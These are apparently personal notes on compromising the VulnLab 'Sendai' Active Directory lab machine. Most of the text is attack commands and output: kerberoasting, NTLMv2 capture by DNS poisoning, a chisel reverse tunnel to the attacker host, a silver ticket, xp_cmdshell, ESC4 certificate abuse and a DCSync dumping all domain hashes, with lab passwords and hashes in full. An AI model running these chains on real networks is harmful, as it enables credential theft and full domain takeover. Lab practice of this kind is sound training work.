Sendai

This is not a writeup, just my notes about VulnLabs machines.

PreviousBreach NextSweep

Last updated 16 days ago

Sendai

This is not a writeup, just my notes about VulnLabs machines.

Operating System: Windows

Chain: False

Credentials

Username

Password

Method

Scope

WEBSVC

Diamond1

DNS Poisoning

Domain Account

sqlsvc

SurenessBlob85

Found in File

Service Principal Name

clifford.davey

RFmoB2WplgE_3p

PrivescCheck.ps1

Domain Account

✅ Valid Usernames

websvc
sqlsvc
DC$
Naomi.Gardner
Kerry.Robinson
Dorothy.Jones
Susan.Harper
Anthony.Smith
Stephen.Simpson
Marie.Gallagher
Kathleen.Kelly
Malcolm.Smith
Jason.Brady
Elliot.Yates
Norman.Baxter
Lisa.Williams
Clifford.Davey
Ross.Sullivan
Declan.Jenkins
Leslie.Johnson
Lawrence.Grant
Megan.Edwards
Thomas.Powell
mgtsvc$

🔑 Passwords list

WEBSVC

Information Gathering

Nmap scan

# Nmap 7.94SVN scan initiated Sun Apr  6 01:01:43 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sendai_tcp_allports -vvv 10.10.113.48
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-06 05:07:57Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
59855/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59867/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59897/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59920/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service enumeration

DNS

Not vulnerable to Zone Transfer AXFR

SMB

Domain SID: S-1-5-21-3085872742-570972823-736764132

Server allows null session authentication (Medium )
Server allows guest session authentication (Medium)
- SID Brute forcing enumeration returned a list of valid domain users.
- Elliot.Yates and Thomas.Powell returned STATUS_PASSWORD_MUST_CHANGE

LDAP

Thomas.Powell does not have vulnerable ADCS template
Elliot.Yates does not have vulnerable ADCS template

Kerberoasting attack

nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --kerberoast kerberoast.hashes
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
LDAP        10.10.65.121    389    DC               Bypassing disabled account krbtgt 
LDAP        10.10.65.121    389    DC               [*] Total of records returned 5
LDAP        10.10.65.121    389    DC               sAMAccountName: mgtsvc$ memberOf: CN=Remote Management Users,CN=Builtin,DC=sendai,DC=vl pwdLastSet: 2023-07-11 09:06:05.143133 lastLogon:<never>
LDAP        10.10.65.121    389    DC               $krb5tgs$18$mgtsvc$$SENDAI.VL$*sendai.vl/mgtsvc$*$6ed01fd1ecee490f551d5ccf$630b14e25f03bad3f22e706306db541144c138ab0255f864da98a09ff07a2430f8e400b6886baf70673f299ee7c3db3d5c5560120311629041e446c0253078a3c22a6a8ca7c9e79c42afd17384274066dfe967fc3ea29ddc6e6756b47ace6e1fe4e020eab21411d2d66a05b690928ff4418b00da847f07d991f43da01a572f7743253176f2a9aa585bf4d84552d688a396c360e993526732cd617ae115358c4f27421848289924e99654a51f73879dd5a7209ded6eef3977220d6cb07d2adab20e337056d6d96f7516c273e09d2255a6930419e2c2ec8a4221482ece01111d029600a2c2fc3ec736a625781c88b43ec05a5cef4b3051a3a2b17ca68a4defabd3ea60fda2deb559b45101cea1129bf86570058a89d36184e98e36b1888e7e576df0de42826a71c874c7795635d8b7182bbeb63c2430a65c6029d7308995e9c27a96e741cea1d69c48416c7fdd6d1dafd581d27751c790bf0ff692b340620d1c184b6f34771fa3fe9df4361b2d76f5b1f3425923299bc2ec9b47d2c4fbc9f8855dca948f970ec22d7f7c5c0f204ab09df1ed1c6be0984c58c9929b5f5496100af2328e3d70e5479437a204135b075238ecf05bd518195b3288db418ea8bb5ca37ae9e0e28009a4e9cf194e153f2b8edd2e35f79396a2e28a8d0b231f4b1b643d56e1ea2179f34e3a070e046a7f704f7f6d9b5c0056cf0a73ef6198fdb445b76c9840930e8dd310d14a8e6d1a937d01b3d9a583014b2d110357b932ab6ea62a23eed0e9703bee6da696afb669deadd264a53a97485684b15f58ab8b928bd8747f041b968d25daa0bf27c308585dc1c2bcb262742766822a3c3c44b56aacb2200d8cd9c22360e8286d191d8b51a706cd110297cc52c54931f72e19f69456b9e097a51070a740e706833a5a3cfd26a0784d93d4bd45cebe51727029601dfc011646f9a4f79539bd45345516c8e89857f6b5f176d7d85e760913647325f6df5e284ad2bf098c12d030429ee60d4b88c456102888dd6ecce13ff354123dc31d489224bd1e2618193fe859c97de0b01cd4409bedf1246ebac76d0cd15e00c782cf17e5f9fe7e13b59b054b153ced54398ba10ec3e8273de1ba3a6489d8a48bbacc980f399582c4d4233217fd91b774c52852a00709fb5541474ded26ab901e2bb46a22d39154ed3ec4228ec78317ba29b9779ce65b7498811082b7b8eedadb476735455aa676361a28904221d3fa3faf8df16674bb932b092333dbde1f63cf6afa54ab72946d653bc1a182b4ea8f9eb94e10899ebc6ad407cb68b47f757f46ac9255c4be017dc4a8152846c2728d351281e3bcf4da2173c77c67d294254049a4117817f918e0aa20fc0f4a4071fba5850035b538cf15e62706c6f66edf701e305d24bf030dbf42c29bd13bef1d4e951240f18653328137833b9af195e4e2b60350c972ca1f2834a6b75ad1385128c1d5c3bc701f61eb8936b902bf1e4a822237507df1a49ea226e0b525a6a9596f5fdc5a006a1a181a6f7a75a87e055b3a7ddc7fba02483449b457c0c6fe2302d6e8cba568b14335bc34638f8438
LDAP        10.10.65.121    389    DC               sAMAccountName: sqlsvc memberOf:  pwdLastSet: 2023-07-11 05:51:18.413329 lastLogon:2025-04-07 14:51:34.464169
LDAP        10.10.65.121    389    DC               $krb5tgs$23$*sqlsvc$SENDAI.VL$sendai.vl/sqlsvc*$95b23428cf862d0e6700ed746da29d63$42e2f8c6b4cba6064ed698af624f81f4fabc184fa7058a006456abaea4ee525cefcfe953a54ddf6b4dc7fce0b400a5cf827333ee33ddccb63b8b9bd7aec2a1e0684dbc1ae9228a7f5ef19722d8062e2b2f0f130842991f3dc7ab00023a6fe17d4914999b73a91c019b3c813fcca2a3f0c145314e92702729011641f9c952ddc5914268a01260a33f35916b917e6e300c7702164d20fd3170d1663809471845d3e01e5b68940f578f182af71f0d3d26cc3764d3897f2aca51d62986c17577b7f1361d2d030da717c44f55a50cb97ffb228c8aad67d7696913bf4428c5519e3c13b0f70bad242f8422e2341521c31d2ccaead66f88555bf3b0909df9525fef82ae422b6d4d752bfe9cbfdc5886263e2e754bba5df6a1f761e0cce924b68d1f5dd24a713a575593561eb94d20d5e2273f6bb2afdcc5f0bfe1a5afe84ae459b1ad26b2812e0455154d01f2e42cca2f69d495385a757d859245df080c76ddf0f4703dec755ba4560b54038380451964740fcf20b785477a9326833b821c7574b76ae3320c5fe2511ea9df87dbd5dab4fa2e5e6e1e4250fff1d1fe072b1e46c9bc4a4892184f5495fda6ba854f0a9a16681e1f4078bcbf7353f5017bd6e7fa1cec2adc2f2bba08c5b7754460c2a7de421eb84677bca999622a70c27f571c275e018f4dc6d27fa9d44a6038c203f491bb77f9973566c9fae08b7a9f71cbded4fd11f229bb48951ebcefc8855b925712486a1079d290cd50bc5e5280778bfe9f8b83f178063ca884eb3377bcda3e3793e5d3acb3a5bf2403df903e369668ba13d979ec95287706efad000df8d1c27b6215751a396290f6b56387ebc1c1edc487338507362b4fd8ef71cf51cd9db011ac87c4d469b01b26ac6ad3a115994a4628222b0189920c8ffb49a3a9b7ec35787f0cccd51af96a029b333d3210dbba7a53b7c9af8d81b279bb687493b367affc9c5775114574244ff0f54cabb9979a238c1246fd303667d39aa887151542418efa80871f8453e583eae94b117eef8a94f5b25bbd73b741dd33518bf522620e173ad0c0d33576eeb11ed4b825c8eccb9ad0d358e43898c2efcb45e55250c038e7fd0a4e07b00e757d2cc29d707a91489c4b9a8ed8d725f82212b91c03bd281e7da299d3bab29f26436974050c2671ccb22cf54a6c759b0a27d8ba4f22a46e3ff4067fe276b0e413921f84c05075e95049f1e2fca45d6c2dff8639760344ac610b71c1c4667a31d766c3e03a829d7acd295244b3737136edf0950bb60370ef12c007372631ecd208d04b9c9770fb03bbc90ed1897fc9473f05a785497a421b58fdaa790c3315bd06a8d80a6e528f047c35932a188265028a73e15c306888100792b21e2040e99406f74e519c11811f848854576f6d48032f354077ba7751ff0ef517d18bab14014782cc3b8e2009d50f3c0b070f97ff72101a98a29a3598b368aaa3b218a9dde43957829f7080c597594009c7a2124aa32e0d122a8bcd1743dc3bfc0496f3e7cfcb0287250107b33f38904e2e6e8b075a327037607b81301b99e506280a588c6f0052ff4cef2d

Bloodhound enumeration

nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' --dns-server 10.10.65.121 --bloodhound -c all
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
LDAP        10.10.65.121    389    DC               Resolved collection methods: psremote, session, trusts, localadmin, group, acl, dcom, objectprops, container, rdp
LDAP        10.10.65.121    389    DC               Done in 00M 32S
LDAP        10.10.65.121    389    DC               Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.65.121_2025-04-07_152023_bloodhound.zip

HTTP

Finding service.sendai.vl

❯ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H  'Host: FUZZ.sendai.vl' -u https://sendai.vl/ -fs 703

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://sendai.vl/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.sendai.vl
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 703
________________________________________________

service                 [Status: 200, Size: 4189, Words: 1104, Lines: 91, Duration: 187ms]

Exploitation

Users with STATUS_PASSWORD_MUST_CHANGE

❯ nxc smb 10.10.65.121 -u users.txt -p '' | grep 'STATUS_PASSWORD_MUST_CHANGE'
SMB                      10.10.65.121    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB                      10.10.65.121    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE

Changing the Users password

❯ impacket-changepasswd sendai.vl/Elliot.Yates@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

❯ impacket-changepasswd sendai.vl/Thomas.Powell@10.10.65.121 -newpass 'Password123!' -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current password not given: will use KRB5CCNAME
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Path 1: Foothold via DACL

Either Thomas.Powell and Elliot.Yates has the same path to compromise MGTSVC$SENDAI.VL and are able to read msDS-ManagedPassword attribute.

Adding Thomas.Powell into admsvc group.

❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'
[+] Thomas.Powell added to admsvc

Reading the mgtsvc$ 's msDS-ManagedPassword attribute.

❯ bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 get object --attr 'msDS-ManagedPassword' 'mgtsvc$'

distinguishedName: CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:c15a7132cd45d7e342dc14f29b50b54c
msDS-ManagedPassword.B64ENCODED: b5iv5Uc3ZyRhBaIWWQGpmxDTzIf4Eo8Pvuj4FwAdguz7ovDcAGblAj/51PuQHnq3CSTZ/ZdJROkw/sEQy+fvSphVWXfR/MG6IsqBp03chmOsugliIYtL4UtEdU0JHFETf8h2iWMs1off8282WKGDB5+HAuYPh1Oza+1QGy7uiOP16m3SNjC5XzbhXUoCv3/H3j2KH2jSwUG7naHNUkcoL0Cz5UqnVfZuXPGXZuzXHqHagwZAvsLmZ0KY+5AnbVeEoGHhpjhbGo5dlBM/udxlpGKD+GQEYoBiD1DE1GKhoZ9Gyi6lDQPfQ0RDUuemhTuz15LqXiTMC6S8oOJfE9Q5xA==

Winrm allowed

❯ nxc winrm 10.10.65.121 -u mgtsvc$ -H 'c15a7132cd45d7e342dc14f29b50b54c'
WINRM       10.10.65.121    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM       10.10.65.121    5985   DC               [+] sendai.vl\mgtsvc$:c15a7132cd45d7e342dc14f29b50b54c (Pwn3d!)

Path 2: Foothold via DNS Poisoning

The site issue DNS resolution which allows to create a fake computer and associated a malicious DNS to capture the NTLMv2

Checkig the MachineAccountQuota

❯ nxc ldap 10.10.65.121 -u Thomas.Powell -p 'Password123!' -M maq
SMB         10.10.65.121    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        10.10.65.121    389    DC               [+] sendai.vl\Thomas.Powell:Password123! 
MAQ         10.10.65.121    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.65.121    389    DC               MachineAccountQuota: 10

Creating a fake computer

❯ impacket-addcomputer sendai.vl/Thomas.Powell:'Password123!' -computer-name z3r0 -computer-pass Password123! -dc-ip 10.10.65.121
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123!

Adding a malicious DNS

❯ python3 dnstool.py -u 'sendai.vl\z3r0$' -p 'Password123!' -r evil.sendai.vl -d 10.8.5.48 -a add dc.sendai.vl -dns-ip 10.10.65.121
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Wait between 8 - 10 minutes to the server is able to spread the new configuration.

Capturing the NTLMv2 hash

sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIF>
[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.65.121
[HTTP] NTLMv2 Username : SENDAI\websvc
[HTTP] NTLMv2 Hash     : websvc::SENDAI:521b32f46ea315bb:24C1C0CDFF3BB516F79639B3DA01AEE2:01010000000000001C4C3FD2F6A7DB010938B3C67A3ACFF600000000020008004D004E005700540001001E00570049004E002D004800340034004B0031004F0054004900540059003800040014004D004E00570054002E004C004F00430041004C0003003400570049004E002D004800340034004B0031004F00540049005400590038002E004D004E00570054002E004C004F00430041004C00050014004D004E00570054002E004C004F00430041004C000800300030000000000000000000000000300000C90663E9BAF7E6AF8B9894B5FCD33BFFF85F68807F8290BBB658CAC443DD21D00A001000000000000000000000000000000000000900260048005400540050002F006500760069006C002E00730065006E006400610069002E0076006C000000000000000000

Cracking the NTLMv2 hash

hashcat -m 5600 websvc.ntlmv2 /usr/share/wordlists/rockyou.txt
<SNIF>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

WEBSVC::SENDAI:521b32f46ea315bb:24c1c0cdff3bb516f79639b3da01aee2:01010000000000001c4c3fd2f6a7db010938b3c67a3acff600000000020008004d004e005700540001001e00570049004e002d004800340034004b0031004f0054004900540059003800040014004d004e00570054002e004c004f00430041004c0003003400570049004e002d004800340034004b0031004f00540049005400590038002e004d004e00570054002e004c004f00430041004c00050014004d004e00570054002e004c004f00430041004c000800300030000000000000000000000000300000c90663e9baf7e6af8b9894b5fcd33bfff85f68807f8290bbb658cac443dd21d00a001000000000000000000000000000000000000900260048005400540050002f006500760069006c002e00730065006e006400610069002e0076006c000000000000000000:Diamond1

Post Exploitation

Path 1: Domain Compromise via MSSQL

Creating the tunnel

#Server
❯ ./chisel server --reverse --socks5 -v -p 1234
# Compromise server (target)
❯ *Evil-WinRM* PS C:\temp> ./chisel client 10.8.5.48:1234 R:socks

Finding sqlsvs plain text credentials credentials

The tester found sqlsvc plaintext credentials in c:\config\.sqlconfig with a MSSQL service account MSSQL/dc.sendai.vl

*Evil-WinRM* PS C:\config> type  .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

Obtaining SID domain account

❯ impacket-lookupsid sendai.vl/Elliot.Yates:'Password123!'@10.10.125.227
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.125.227
[*] StringBinding ncacn_np:10.10.125.227[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132

Retrieving nt hash through plaintext password

❯ pypykatz crypto nt 'SurenessBlob85'
58655c0b90b2492f84fb46fa78c2d96a

Crafting silver ticket

❯ impacket-ticketer -nthash 58655c0b90b2492f84fb46fa78c2d96a -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl Administrator  2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
❯ export KRB5CCNAME=Administrator.ccache

Connecting and enable xp_cmdshell

❯ proxychains impacket-mssqlclient -k DC.sendai.vl 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\Administrator  dbo@master)> enable_xp_cmdshell
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)>

Abusing seImpersonatePrivilege to compromise domain

Path 2: Domain Compromise via ADCS

Finding clifford.davey plaintext credentials

*Evil-WinRM* PS C:\Temp> Import-Module .\PrivescCheck.ps1
*Evil-WinRM* PS C:\Temp> Invoke-PrivescCheck
<SNIF>
Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic
<SNIF>

Attacking ESC4 Misconfiguration (Automatic)

To make a template vulnerable, the following attributes need to be modified with the specified values:

Grant Enrollment rights for the vulnerable template.
Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval.
Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement.
Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN.
Set the mspki-certificate-application-policy to a certificate purpose for authentication:
- Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
- Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
- PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
- Any Purpose (OID: 2.5.29.37.0)
- No Extended Key Usage (EKU)

❯ certipy-ad template -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -template SendaiComputer
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'

Retrieving Adminsitrator's certificate

❯ certipy-ad req -u 'clifford.davey' -p 'RFmoB2WplgE_3p' -dc-ip 10.10.125.227 -ca sendai-DC-CA -template SendaiComputer -upn Administrator 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Retrieving Administrator's NT hash

❯ certipy-ad auth -username Administrator -dc-ip 10.10.125.227 -pfx administrator.pfx -domain sendai.vl 2>/dev/null
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a

Requesting an Ticket Granting Ticket to kerberos authentication

❯ impacket-getTGT sendai.vl/administrator@10.10.125.227 -hashes aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator@10.10.125.227.ccache

Performing DCSync Attack agains domain controller.

❯ KRB5CCNAME=administrator@10.10.125.227.ccache impacket-secretsdump -k -no-pass dc.sendai.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9eb8311492c343dda00353551e8139c:::
sendai.vl\sqlsvc:1104:aad3b435b51404eeaad3b435b51404ee:58655c0b90b2492f84fb46fa78c2d96a:::
sendai.vl\websvc:1105:aad3b435b51404eeaad3b435b51404ee:53e938166782a44e241beaf02d081ff6:::
sendai.vl\Dorothy.Jones:1108:aad3b435b51404eeaad3b435b51404ee:f2eb7a2c6dd45d09d2fb286427310ab4:::
sendai.vl\Kerry.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:e869ae31413c9fe641fe6dd821ff41a4:::
sendai.vl\Naomi.Gardner:1110:aad3b435b51404eeaad3b435b51404ee:5787671779f39832379c2f1f17ed330c:::
sendai.vl\Anthony.Smith:1111:aad3b435b51404eeaad3b435b51404ee:d4d0cf817328027f80f3e3d7a9fdfb8a:::
sendai.vl\Susan.Harper:1112:aad3b435b51404eeaad3b435b51404ee:b0e19c54d92d45a9a194dc06fbfc6188:::
sendai.vl\Stephen.Simpson:1113:aad3b435b51404eeaad3b435b51404ee:f7c556037f989ee74a5ebf29cf04f15c:::
sendai.vl\Marie.Gallagher:1114:aad3b435b51404eeaad3b435b51404ee:3aff33bedfdada08baebfa52cee187d4:::
sendai.vl\Kathleen.Kelly:1115:aad3b435b51404eeaad3b435b51404ee:edae39c82dea107d7c2bd1dcb5b10bf5:::
sendai.vl\Norman.Baxter:1116:aad3b435b51404eeaad3b435b51404ee:cb3d9487230e44e11747c549bbfeda64:::
sendai.vl\Jason.Brady:1117:aad3b435b51404eeaad3b435b51404ee:5dfdfee0fd6859f189e46d2355487b81:::
sendai.vl\Elliot.Yates:1118:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
sendai.vl\Malcolm.Smith:1119:aad3b435b51404eeaad3b435b51404ee:074a36e90a6fe3c1004cdd6b99aa068d:::
sendai.vl\Lisa.Williams:1120:aad3b435b51404eeaad3b435b51404ee:4210e68078724566518b8ad3f197a4a6:::
sendai.vl\Ross.Sullivan:1121:aad3b435b51404eeaad3b435b51404ee:51c235bbb7188c6181f44673ae5ef75c:::
sendai.vl\Clifford.Davey:1122:aad3b435b51404eeaad3b435b51404ee:13cee2652d9af0b63e3ebda229edf2ed:::
sendai.vl\Declan.Jenkins:1123:aad3b435b51404eeaad3b435b51404ee:11b192a7320a24b39492af79090fbc83:::
sendai.vl\Lawrence.Grant:1124:aad3b435b51404eeaad3b435b51404ee:9b912c25ef31bf4cdecbfea1381fbdd1:::
sendai.vl\Leslie.Johnson:1125:aad3b435b51404eeaad3b435b51404ee:d3d65c0ec99d83e2392be353f9fef684:::
sendai.vl\Megan.Edwards:1126:aad3b435b51404eeaad3b435b51404ee:e11dab55fa474c3465a133a50e439ebe:::
sendai.vl\Thomas.Powell:1127:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:336ce5de80f66e34727ff2459bb6fbd8:::
mgtsvc$:1130:aad3b435b51404eeaad3b435b51404ee:c15a7132cd45d7e342dc14f29b50b54c:::

PreviousBreach NextSweep

Last updated 16 days ago

Operating System: Windows

Chain: False

Credentials

Username

Password

Method

Scope

WEBSVC

Diamond1

DNS Poisoning

Domain Account

sqlsvc

SurenessBlob85

Found in File

Service Principal Name

clifford.davey

RFmoB2WplgE_3p

PrivescCheck.ps1

Domain Account

✅ Valid Usernames

websvc
sqlsvc
DC$
Naomi.Gardner
Kerry.Robinson
Dorothy.Jones
Susan.Harper
Anthony.Smith
Stephen.Simpson
Marie.Gallagher
Kathleen.Kelly
Malcolm.Smith
Jason.Brady
Elliot.Yates
Norman.Baxter
Lisa.Williams
Clifford.Davey
Ross.Sullivan
Declan.Jenkins
Leslie.Johnson
Lawrence.Grant
Megan.Edwards
Thomas.Powell
mgtsvc$

🔑 Passwords list

WEBSVC

Information Gathering

Nmap scan

# Nmap 7.94SVN scan initiated Sun Apr  6 01:01:43 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sendai_tcp_allports -vvv 10.10.113.48
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-06 05:07:57Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
59855/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
